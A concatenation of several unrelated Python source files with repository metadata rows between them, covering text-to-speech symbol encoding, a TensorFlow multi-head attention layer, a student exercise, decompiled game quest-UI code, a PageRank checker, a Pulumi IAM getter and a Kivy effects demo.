_ctc_symbole_to_id = {s: i for i, s in enumerate(ctc_symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
sequence += _symbols_to_sequence(_clean_text(text, cleaner_names))
break
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
return sequence
def sequence_to_ctc_sequence(sequence):
return [_ctc_symbole_to_id[_id_to_symbol[s]] for s in sequence if _id_to_symbol[s] in ctc_symbols]
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = ''
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result += s
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
return s in symbol_to_id and s is not '_' and s is not '~'
| [
"[email protected]"
] | |
a0af01108c13fc966f89021c5c91150515e97d0d | b9c9215eb12ab8f0dcc4a5d964dc97ac2ad62257 | /supervised_learning/0x11-attention/6-multihead_attention.py | 76729225e985b407847cb68ae5dc2a513672b6cb | [] | no_license | AndrewMiranda/holbertonschool-machine_learning-1 | 0318c2f45c863721b478acae26a5a874290e6445 | e8a98d85b3bfd5665cb04bec9ee8c3eb23d6bd58 | refs/heads/main | 2023-01-19T00:34:15.264705 | 2022-07-25T15:10:43 | 2022-07-25T15:10:43 | 386,514,270 | 0 | 0 | null | 2021-07-16T04:58:08 | 2021-07-16T04:58:07 | null | UTF-8 | Python | false | false | 3,218 | py | #!/usr/bin/env python3
"""File that conatins the class MultiHeadAttention"""
import tensorflow as tf
sdp_attention = __import__('5-sdp_attention').sdp_attention
class MultiHeadAttention(tf.keras.layers.Layer):
"""Class that perform multi head attention"""
def __init__(self, dm, h):
"""
Class constructor
dm is an integer representing the dimensionality of the model
h is an integer representing the number of heads
dm is divisible by h
Sets the following public instance attributes:
h - the number of heads
dm - the dimensionality of the model
depth - the depth of each attention head
Wq - a Dense layer with dm units, used to generate the query matrix
Wk - a Dense layer with dm units, used to generate the key matrix
Wv - a Dense layer with dm units, used to generate the value matrix
linear - a Dense layer with dm units, used to generate the attention
output
"""
self.h = h
self.dm = dm
self.depth = dm // h
self.Wq = tf.keras.layers.Dense(units=dm)
self.Wk = tf.keras.layers.Dense(units=dm)
self.Wv = tf.keras.layers.Dense(units=dm)
self.linear = tf.keras.layers.Dense(units=dm)
super(MultiHeadAttention, self).__init__()
def call(self, Q, K, V, mask):
"""
Publci instance method
Args:
Q is a tensor of shape (batch, seq_len_q, dk) containing the input to
generate the query matrix
K is a tensor of shape (batch, seq_len_v, dk) containing the input to
generate the key matrix
V is a tensor of shape (batch, seq_len_v, dv) containing the input to
generate the value matrix
mask is always None
Returns: output, weights
outputa tensor with its last two dimensions as (..., seq_len_q, dm)
containing the scaled dot product attention
weights a tensor with its last three dimensions as
(..., h, seq_len_q, seq_len_v) containing the attention weights
"""
def split_heads(x, batch_size):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size,
num_heads, seq_len, depth)"""
x = tf.reshape(x, (batch_size, -1, self.h, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
batch_size = tf.shape(Q)[0]
q = self.Wq(Q) # (batch_size, seq_len, d_model)
k = self.Wk(K) # (batch_size, seq_len, d_model)
v = self.Wv(V) # (batch_size, seq_len, d_model)
q = split_heads(q, batch_size)
k = split_heads(k, batch_size)
v = split_heads(v, batch_size)
scaled_attention, attention_weights = sdp_attention(q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention,
perm=[0, 2, 1, 3])
concat_attention = tf.reshape(scaled_attention, (batch_size, -1,
self.dm))
output = self.linear(concat_attention)
return output, attention_weights
| [
"[email protected]"
] | |
0c24daedded2881c22f5beb167c8ee8b0efba4f0 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/112/23295/submittedfiles/av2_p3_civil.py | 190a7d9f68a0de2937c3818addab0a1181fc2f81 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
linhas=input('Digite a quandidade de linhas:')
a=np.zeros((linhas,linhas))
for i in range (0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=input('Digite o termo:')
print a
x=input('Digite a coordenada x da localização da torre:')
y=input('Digite a coordenada y da localização da torre:')
def locali(a):
for i in range (0,a.shape[0],1):
for j in range (0,a.shape[1],1):
a[x,y]
return a[x,y]
print locali(a)
def soma_linha(a):
s=[]
for i in range (0,a.shape[0],1):
soma=0
for j in range (0,a.shape[1],1):
soma=soma+a[i,j]
s.append(soma)
for r in range(0,len(s),1):
c=s[y]
return c
print soma_linha(a)
| [
"[email protected]"
] | |
3d753eee73c94b858c52d1e6d561825f5839fb8d | a70697ef62978117467695fd3507e4d08e186ab4 | /source/res/scripts/client/gui/scaleform/daapi/view/lobby/server_events/events_helpers.py | 339785d042db63990f89e8ea039173f16cc705a1 | [] | no_license | chipsi007/WorldOfTanks-Decompiled | d208678a6f2f094b02281d09ecc30f3e32725ce9 | 3b9dc21321429e4dee146c23c7250f2c62757937 | refs/heads/master | 2020-03-19T01:21:09.883951 | 2018-05-04T13:19:56 | 2018-05-04T13:19:56 | 135,538,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,682 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/server_events/events_helpers.py
import operator
from collections import defaultdict
import BigWorld
import constants
from constants import EVENT_TYPE
from gui import makeHtmlString
from gui.Scaleform.daapi.view.lobby.server_events.awards_formatters import OldStyleBonusesFormatter
from gui.Scaleform.genConsts.QUESTS_ALIASES import QUESTS_ALIASES
from gui.Scaleform.locale.PERSONAL_MISSIONS import PERSONAL_MISSIONS
from gui.Scaleform.locale.QUESTS import QUESTS
from gui.Scaleform.locale.TOOLTIPS import TOOLTIPS
from gui.server_events import formatters, conditions, settings as quest_settings
from gui.server_events.events_helpers import EventInfoModel, MISSIONS_STATES, QuestInfoModel
from gui.shared.formatters import text_styles
from helpers import i18n, int2roman, time_utils, dependency
from personal_missions import PM_BRANCH
from quest_xml_source import MAX_BONUS_LIMIT
from skeletons.gui.shared import IItemsCache
_AWARDS_PER_PAGE = 3
FINISH_TIME_LEFT_TO_SHOW = time_utils.ONE_DAY
START_TIME_LIMIT = 5 * time_utils.ONE_DAY
class _EventInfo(EventInfoModel):
def getInfo(self, svrEvents, pCur=None, pPrev=None, noProgressInfo=False):
if noProgressInfo:
status, _ = MISSIONS_STATES.NONE, self._getStatus()[1]
bonusCount = self.NO_BONUS_COUNT
qProgCur, qProgTot, qProgbarType, tooltip = (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
else:
bonusCount = self._getBonusCount(pCur)
status, _ = self._getStatus(pCur)
qProgCur, qProgTot, qProgbarType, tooltip = self._getProgressValues(svrEvents, pCur, pPrev)
isAvailable, _ = self.event.isAvailable()
return {'questID': str(self.event.getID()),
'eventType': self.event.getType(),
'IGR': self.event.isIGR(),
'taskType': self.event.getUserType(),
'tasksCount': bonusCount,
'progrBarType': qProgbarType,
'progrTooltip': tooltip,
'maxProgrVal': qProgTot,
'currentProgrVal': qProgCur,
'rendererType': QUESTS_ALIASES.RENDERER_TYPE_QUEST,
'timerDescription': self.getTimerMsg(),
'status': status,
'description': self.event.getUserName(),
'tooltip': TOOLTIPS.QUESTS_RENDERER_LABEL,
'isSelectable': True,
'isNew': quest_settings.isNewCommonEvent(self.event),
'isAvailable': isAvailable}
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
index = 0
progresses = []
if not isProgressReset and not isCompleted:
for cond in self.event.bonusCond.getConditions().items:
if isinstance(cond, conditions._Cumulativable):
for _, (curProg, totalProg, diff, _) in cond.getProgressPerGroup(pCur, pPrev).iteritems():
label = cond.getUserString()
if not diff or not label:
continue
index += 1
progresses.append({'progrTooltip': None,
'progrBarType': formatters.PROGRESS_BAR_TYPE.SIMPLE,
'maxProgrVal': totalProg,
'currentProgrVal': curProg,
'description': '%d. %s' % (index, label),
'progressDiff': '+ %s' % BigWorld.wg_getIntegralFormat(diff)})
if not progresses:
return
alertMsg = ''
if isProgressReset:
alertMsg = i18n.makeString('#quests:postBattle/progressReset')
_, awards = ('', None)
if not isProgressReset and isCompleted:
awards = self._getBonuses(svrEvents)
return {'title': self.event.getUserName(),
'awards': awards,
'progressList': progresses,
'alertMsg': alertMsg,
'questInfo': self.getInfo(svrEvents, pCur, pPrev),
'personalInfo': [],
'questType': self.event.getType()}
@classmethod
def _getEventsByIDs(cls, ids, svrEvents):
result = {}
for eID in ids:
if eID in svrEvents:
result[eID] = svrEvents[eID]
return result
def _getBonusCount(self, pCur=None):
return self.NO_BONUS_COUNT
def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None):
return (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
def _getBonuses(self, svrEvents, bonuses=None):
return []
class _QuestInfo(_EventInfo, QuestInfoModel):
PROGRESS_TOOLTIP_MAX_ITEMS = 4
itemsCache = dependency.descriptor(IItemsCache)
def _getStatus(self, pCur=None):
if self.event.isCompleted(progress=pCur):
if self.event.bonusCond.isDaily():
msg = self._getCompleteDailyStatus('#quests:details/status/completed/daily')
else:
msg = i18n.makeString('#quests:details/status/completed')
return (MISSIONS_STATES.COMPLETED, msg)
else:
isAvailable, errorMsg = self.event.isAvailable()
if not isAvailable:
timeLeftInfo = self.event.getNearestActivityTimeLeft()
if errorMsg in ('in_future', 'invalid_weekday', 'invalid_time_interval') and timeLeftInfo is not None:
startTimeLeft = timeLeftInfo[0]
if startTimeLeft > START_TIME_LIMIT:
fmt = self._getDateTimeString(self.event.getStartTime())
else:
fmt = self._getTillTimeString(startTimeLeft)
msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg, time=fmt)
else:
msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg)
return (MISSIONS_STATES.NOT_AVAILABLE, msg)
bonus = self.event.bonusCond
bonusLimit = bonus.getBonusLimit()
if bonusLimit is None or bonusLimit >= MAX_BONUS_LIMIT:
msg = i18n.makeString(QUESTS.DETAILS_HEADER_COMPLETION_UNLIMITED)
else:
groupBy = bonus.getGroupByValue()
if bonus.isDaily():
key = QUESTS.DETAILS_HEADER_COMPLETION_DAILY
if groupBy is not None:
key = '#quests:details/header/completion/daily/groupBy%s' % groupBy.capitalize()
else:
key = QUESTS.DETAILS_HEADER_COMPLETION_SINGLE
if groupBy is not None:
key = '#quests:details/header/completion/single/groupBy%s' % groupBy.capitalize()
msg = i18n.makeString(key, count=bonusLimit)
return (MISSIONS_STATES.NONE, msg)
def _getBonuses(self, svrEvents, bonuses=None):
bonuses = bonuses or self.event.getBonuses()
result = OldStyleBonusesFormatter(self.event).getFormattedBonuses(bonuses)
return formatters.todict(result) if result else formatters.todict([formatters.packTextBlock(text_styles.alert('#quests:bonuses/notAvailable'))])
def _getBonusCount(self, pCur=None):
if not self.event.isCompleted(progress=pCur):
bonusLimit = self.event.bonusCond.getBonusLimit()
if bonusLimit is None or bonusLimit > 1 or self.event.bonusCond.getGroupByValue() is not None:
return self.event.getBonusCount(progress=pCur)
return self.NO_BONUS_COUNT
def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None):
current, total, progressType, tooltip = (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
groupBy = self.event.bonusCond.getGroupByValue()
condsRoot = self.event.bonusCond.getConditions()
if self.event.isCompleted(pCur) or condsRoot.isEmpty():
return (current,
total,
progressType,
tooltip)
else:
countOfCumulatives = 0
cumulatives = defaultdict(list)
for cond in condsRoot.items:
if isinstance(cond, conditions._Cumulativable):
countOfCumulatives += 1
for groupByKey, (cur, tot, _, isCompleted) in cond.getProgressPerGroup(pCur, pPrev).iteritems():
if not isCompleted:
cumulatives[groupByKey].append((cur, tot))
if groupBy is None and countOfCumulatives == 1 and cumulatives[None]:
(current, total), progressType = cumulatives[None][0], formatters.PROGRESS_BAR_TYPE.SIMPLE
else:
avgProgressesPerGroup = []
for groupByKey, values in cumulatives.iteritems():
progressesSum = sum([ c / float(t) for c, t in values ])
avgProgressesPerGroup.append((groupByKey, int(round(100.0 * progressesSum / len(values))), 100))
avgProgresses = sorted(avgProgressesPerGroup, key=operator.itemgetter(1), reverse=True)
if avgProgresses:
(groupByKey, current, total), nearestProgs = avgProgresses[0], avgProgresses[1:]
progressType = formatters.PROGRESS_BAR_TYPE.COMMON
if groupBy is not None and groupByKey is not None:
name, names = ('', '')
if groupBy == 'vehicle':
name = self.itemsCache.items.getItemByCD(groupByKey).shortUserName
names = [ self.itemsCache.items.getItemByCD(intCD).shortUserName for intCD, _, __ in nearestProgs ]
elif groupBy == 'nation':
name = i18n.makeString('#menu:nations/%s' % groupByKey)
names = [ i18n.makeString('#menu:nations/%s' % n) for n, _, __ in nearestProgs ]
elif groupBy == 'class':
name = i18n.makeString('#menu:classes/%s' % groupByKey)
names = [ i18n.makeString('#menu:classes/%s' % n) for n, _, __ in nearestProgs ]
elif groupBy == 'level':
def makeLvlStr(lvl):
return i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_NOTE_LEVEL, int2roman(lvl))
name = makeLvlStr(int(groupByKey.replace('level ', '')))
names = [ makeLvlStr(int(l.replace('level ', ''))) for l, _, __ in nearestProgs ]
note = None
if names:
note = makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'note', {'names': ', '.join(names[:self.PROGRESS_TOOLTIP_MAX_ITEMS])})
tooltip = {'header': i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_HEADER),
'body': makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'body', {'name': name}),
'note': note}
return (current,
total,
progressType,
tooltip)
class _PersonalMissionInfo(_QuestInfo):
def _getBonuses(self, svrEvents, _=None):
mainBonuses = self.event.getBonuses(isMain=True)
addBonuses = self.event.getBonuses(isMain=False)
return (_QuestInfo._getBonuses(self, None, bonuses=mainBonuses), _QuestInfo._getBonuses(self, None, bonuses=addBonuses))
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
def _packCondition(titleKey, text):
return '%s\n%s' % (text_styles.middleTitle(i18n.makeString(titleKey)), text_styles.main(text))
def _packStatus(completed):
return 'done' if completed else 'notDone'
return {'title': self.event.getUserName(),
'questInfo': self.getInfo(svrEvents),
'awards': None,
'progressList': [],
'alertMsg': '',
'personalInfo': [{'statusStr': _packStatus(isCompleted[0]),
'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_MAINCONDITIONS, self.event.getUserMainCondition())}, {'statusStr': _packStatus(isCompleted[1]),
'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_ADDITIONALCONDITIONS, self.event.getUserAddCondition())}],
'questType': self.event.getType()}
class _MotiveQuestInfo(_QuestInfo):
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
motiveQuests = [ q for q in svrEvents.values() if q.getType() == EVENT_TYPE.MOTIVE_QUEST and not q.isCompleted() ]
info = super(_MotiveQuestInfo, self).getPostBattleInfo(svrEvents, pCur, pPrev, isProgressReset, isCompleted)
info.update({'isLinkBtnVisible': len(motiveQuests) > 0})
return info
def getEventInfoData(event):
if event.getType() == constants.EVENT_TYPE.PERSONAL_MISSION:
return _PersonalMissionInfo(event)
if event.getType() == constants.EVENT_TYPE.MOTIVE_QUEST:
return _MotiveQuestInfo(event)
return _QuestInfo(event) if event.getType() in constants.EVENT_TYPE.QUEST_RANGE else _EventInfo(event)
def getEventPostBattleInfo(event, svrEvents=None, pCur=None, pPrev=None, isProgressReset=False, isCompleted=False):
return getEventInfoData(event).getPostBattleInfo(svrEvents, pCur or {}, pPrev or {}, isProgressReset, isCompleted)
_questBranchToTabMap = {PM_BRANCH.REGULAR: QUESTS_ALIASES.SEASON_VIEW_TAB_RANDOM}
| [
"[email protected]"
] | |
181d1d5084af6522c9e3c33e95be5e086608176e | a38b4c82feabe5be163ad2eeb5a46f38aeb88d77 | /regressions/checkPageRank.py | 6980c594526fb6e07683fdcf02458c065697e1c9 | [
"Apache-2.0"
] | permissive | zzmjohn/vertexAPI2 | a9ae240c2fde55dc5be4a96f0017e8a2e204b258 | cf59a50d1239f3ea892a7473f8175958c7ac0051 | refs/heads/master | 2020-12-29T01:23:04.602915 | 2013-12-16T18:32:17 | 2013-12-16T18:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,570 | py | #!/usr/bin/python2
#script to compare pagerank outputs
import sys
from math import fabs
#load ranks for file fn
def load( f ):
ret = {}
for line in f:
vid, val = line.strip().split()
ret[ int(vid) ] = float(val)
return ret
def compare( tol_vals, tol_allowed, test, gold ):
histo_counts = [0] * (len(tol_vals) + 1)
for vid, val in test.items():
try:
diff = fabs( gold[ vid ] - val )
pos = len(tol_vals) - 1
while pos >= 0 and diff < tol_vals[pos]:
pos -= 1
histo_counts[pos + 1] += 1
except KeyError:
print "vid ", vid, " is in test but not in gold"
#this is not an error, we just output all vertices
#but powergraph does not
#return False
totalItems = float(len(test))
for idx in range(len(histo_counts)):
histo_counts[idx] /= totalItems
if histo_counts[idx] > tol_allowed[idx]:
print "Percentage too high: ", tol_allowed[idx], histo_counts[idx]
return False
return True
if __name__ == '__main__':
if len( sys.argv ) != 3:
print "Usage: checkPageRank.py test gold"
sys.exit(1)
test = sys.argv[1]
gold = sys.argv[2]
td = load( open(test) )
gd = load( open(gold) )
#this means we allow up to 100% of values differing by less than .0001
#.9% of values by more than .0001 and less than .001
#.09% of values by more than .001 and less than .01
#.009% of values by more than .01 and less than .1
#0 values more than .1
if not compare( [.0001, .001, .01, .1, 1, 10], [1., 1e-2, 5e-3, 5e-4, 5e-5, 5e-6, 0], td, gd ):
sys.exit(1)
| [
"[email protected]"
] | |
b5aab17911c032c7a93a159e063628fc4536e61e | bcb56cc126ea1885eb5ecc920884e2e331def045 | /Part A/Déjà Vu.py | a510d4a81463d13148adb3624a1c08c02197962b | [] | no_license | priyanshkedia04/Codeforces-Solutions | 2d11cb7b8329fe658f983b7212c17fc89fd784f0 | a5197c633bf4c3238f48bfb5b308144c2ffba473 | refs/heads/main | 2023-06-06T13:10:13.787843 | 2021-07-01T14:06:52 | 2021-07-01T14:06:52 | 382,000,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | for i in range(int(input())):
s = input()
temp1 = s + 'a'
temp2 = 'a' + s
if temp2 != temp2[::-1]:
print('YES')
print(temp2)
elif temp1 != temp1[::-1]:
print('YES')
print(temp1)
else:
print('NO') | [
"[email protected]"
] | |
a373c25612d158c45a37dc78cace10f973142be9 | 824b582c2e0236e987a29b233308917fbdfc57a7 | /sdk/python/pulumi_google_native/datacatalog/v1/get_taxonomy_iam_policy.py | f0fed1764ad2f9761170c7b668b41b7acf80b119 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | 24601/pulumi-google-native | ce8faf8455609a9572a8cbe0638c66427bf0ae7f | b219a14201c6c58eaa10caaeacbdaab528931adf | refs/heads/master | 2023-08-23T05:48:31.819709 | 2021-10-08T18:50:44 | 2021-10-08T18:50:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,399 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetTaxonomyIamPolicyResult',
'AwaitableGetTaxonomyIamPolicyResult',
'get_taxonomy_iam_policy',
'get_taxonomy_iam_policy_output',
]
@pulumi.output_type
class GetTaxonomyIamPolicyResult:
def __init__(__self__, bindings=None, etag=None, version=None):
if bindings and not isinstance(bindings, list):
raise TypeError("Expected argument 'bindings' to be a list")
pulumi.set(__self__, "bindings", bindings)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if version and not isinstance(version, int):
raise TypeError("Expected argument 'version' to be a int")
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bindings(self) -> Sequence['outputs.BindingResponse']:
"""
Associates a list of `members` to a `role`. Optionally, may specify a `condition` that determines how and when the `bindings` are applied. Each of the `bindings` must contain at least one member.
"""
return pulumi.get(self, "bindings")
@property
@pulumi.getter
def etag(self) -> str:
"""
`etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other. It is strongly suggested that systems make use of the `etag` in the read-modify-write cycle to perform policy updates in order to avoid race conditions: An `etag` is returned in the response to `getIamPolicy`, and systems are expected to put that etag in the request to `setIamPolicy` to ensure that their change will be applied to the same version of the policy. **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def version(self) -> int:
"""
Specifies the format of the policy. Valid values are `0`, `1`, and `3`. Requests that specify an invalid value are rejected. Any operation that affects conditional role bindings must specify version `3`. This requirement applies to the following operations: * Getting a policy that includes a conditional role binding * Adding a conditional role binding to a policy * Changing a conditional role binding in a policy * Removing any role binding, with or without a condition, from a policy that includes conditions **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. If a policy does not include any conditions, operations on that policy may specify any valid version or leave the field unset. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
"""
return pulumi.get(self, "version")
class AwaitableGetTaxonomyIamPolicyResult(GetTaxonomyIamPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTaxonomyIamPolicyResult(
bindings=self.bindings,
etag=self.etag,
version=self.version)
def get_taxonomy_iam_policy(location: Optional[str] = None,
project: Optional[str] = None,
taxonomy_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTaxonomyIamPolicyResult:
"""
Gets the IAM policy for a policy tag or a taxonomy.
"""
__args__ = dict()
__args__['location'] = location
__args__['project'] = project
__args__['taxonomyId'] = taxonomy_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('google-native:datacatalog/v1:getTaxonomyIamPolicy', __args__, opts=opts, typ=GetTaxonomyIamPolicyResult).value
return AwaitableGetTaxonomyIamPolicyResult(
bindings=__ret__.bindings,
etag=__ret__.etag,
version=__ret__.version)
@_utilities.lift_output_func(get_taxonomy_iam_policy)
def get_taxonomy_iam_policy_output(location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[Optional[str]]] = None,
taxonomy_id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetTaxonomyIamPolicyResult]:
"""
Gets the IAM policy for a policy tag or a taxonomy.
"""
...
| [
"[email protected]"
] | |
7e79b503b18d0387b9dfa5034bb0f9a4e2e53d84 | 48d1002394d233cf5932c7ef69300400af79118a | /examples/widgets/effectwidget.py | aeaf2d149fa96c8762405a9a404318773e80f479 | [
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
] | permissive | kivy/kivy | ba2668bffe4e125fd1c5aace54f671343802850e | ca1b918c656f23e401707388f25f4a63d9b8ae7d | refs/heads/master | 2023-09-04T02:27:05.311875 | 2023-08-26T08:00:20 | 2023-08-26T08:00:20 | 1,049,095 | 16,076 | 4,161 | MIT | 2023-09-09T07:55:18 | 2010-11-03T20:27:32 | Python | UTF-8 | Python | false | false | 5,485 | py | '''
Example usage of the effectwidget.
Currently highly experimental.
'''
from kivy.app import App
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.spinner import Spinner
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.effectwidget import (MonochromeEffect,
InvertEffect,
ChannelMixEffect,
ScanlinesEffect,
FXAAEffect,
PixelateEffect,
HorizontalBlurEffect,
VerticalBlurEffect)
class ComparisonWidget(EffectWidget):
pass
class EffectSpinner(Spinner):
pass
class SpinnerRow(BoxLayout):
effectwidget = ObjectProperty()
def update_effectwidget(self, *args):
effects = []
for child in self.children[::-1]:
text = child.text
if text == 'none':
pass
if text == 'fxaa':
effects.append(FXAAEffect())
if text == 'monochrome':
effects.append(MonochromeEffect())
if text == 'invert':
effects.append(InvertEffect())
if text == 'mix':
effects.append(ChannelMixEffect())
if text == 'blur_h':
effects.append(HorizontalBlurEffect())
if text == 'blur_v':
effects.append(VerticalBlurEffect())
if text == 'postprocessing':
effects.append(ScanlinesEffect())
if text == 'pixelate':
effects.append(PixelateEffect())
if self.effectwidget:
self.effectwidget.effects = effects
example = Builder.load_string('''
#:import Vector kivy.vector.Vector
BoxLayout:
orientation: 'vertical'
FloatLayout:
ComparisonWidget:
pos_hint: {'x': 0, 'y': 0}
size_hint: 0.5, 1
id: effect1
ComparisonWidget:
pos_hint: {'x': pos_slider.value, 'y': 0}
size_hint: 0.5, 1
id: effect2
background_color: (rs.value, gs.value, bs.value, als.value)
SpinnerRow:
effectwidget: effect1
text: 'left effects'
SpinnerRow:
effectwidget: effect2
text: 'right effects'
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'control overlap:'
Slider:
min: 0
max: 0.5
value: 0.5
id: pos_slider
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'right bg r,g,b,a'
Slider:
min: 0
max: 1
value: 0
id: rs
Slider:
min: 0
max: 1
value: 0
id: gs
Slider:
min: 0
max: 1
value: 0
id: bs
Slider:
min: 0
max: 1
value: 0
id: als
<ComparisonWidget>:
Widget:
canvas:
Color:
rgba: 1, 0, 0, 1
Ellipse:
pos: Vector(self.pos) + 0.5*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 1, 0.3, 1
Ellipse:
pos: Vector(self.pos) + 0.1*Vector(self.size)
size: 0.6*Vector(self.size)
Color:
rgba: 0.5, 0.3, 0.8, 1
Ellipse:
pos: Vector(self.pos) + Vector([0, 0.6])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 1, 0.8, 0.1, 1
Ellipse:
pos: Vector(self.pos) + Vector([0.5, 0])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 0, 0.8, 1
Line:
points:
[self.x, self.y,
self.x + self.width, self.y + 0.3*self.height,
self.x + 0.2*self.width, self.y + 0.1*self.height,
self.x + 0.85*self.width, self.y + 0.72*self.height,
self.x + 0.31*self.width, self.y + 0.6*self.height,
self.x, self.top]
width: 1
Color:
rgba: 0, 0.9, 0.1, 1
Line:
points:
[self.x + self.width, self.y + self.height,
self.x + 0.35*self.width, self.y + 0.6*self.height,
self.x + 0.7*self.width, self.y + 0.15*self.height,
self.x + 0.2*self.width, self.y + 0.22*self.height,
self.x + 0.3*self.width, self.y + 0.92*self.height]
width: 2
<SpinnerRow>:
orientation: 'horizontal'
size_hint_y: None
height: dp(40)
text: ''
Label:
text: root.text
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
<EffectSpinner>:
text: 'none'
values:
['none', 'fxaa', 'monochrome',
'invert', 'mix',
'blur_h', 'blur_v',
'postprocessing', 'pixelate',]
''')
class EffectApp(App):
def build(self):
return example
EffectApp().run()
| [
"[email protected]"
] | |
5c0f91846cc2feeb9b6bc2da717f71a9af08ea58 | d99e5b65624f115db6982dd88af9390e8d766042 | /tensorflow/contrib/distributions/python/ops/bijector.py | 7a089bb53be8450af76210f20a513e17fe54b1c3 | [
"Apache-2.0"
] | permissive | golbin/tensorflow | 03dbecb6f093f5628c072086c780659bcc14dba8 | 8a58a304bdcf909f8b55ec49e9280fc3af01c7d3 | refs/heads/master | 2021-01-12T07:05:41.360503 | 2016-12-20T00:15:41 | 2016-12-20T00:15:41 | 76,907,006 | 2 | 0 | null | 2016-12-19T23:58:44 | 2016-12-19T23:58:43 | null | UTF-8 | Python | false | false | 93,743 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
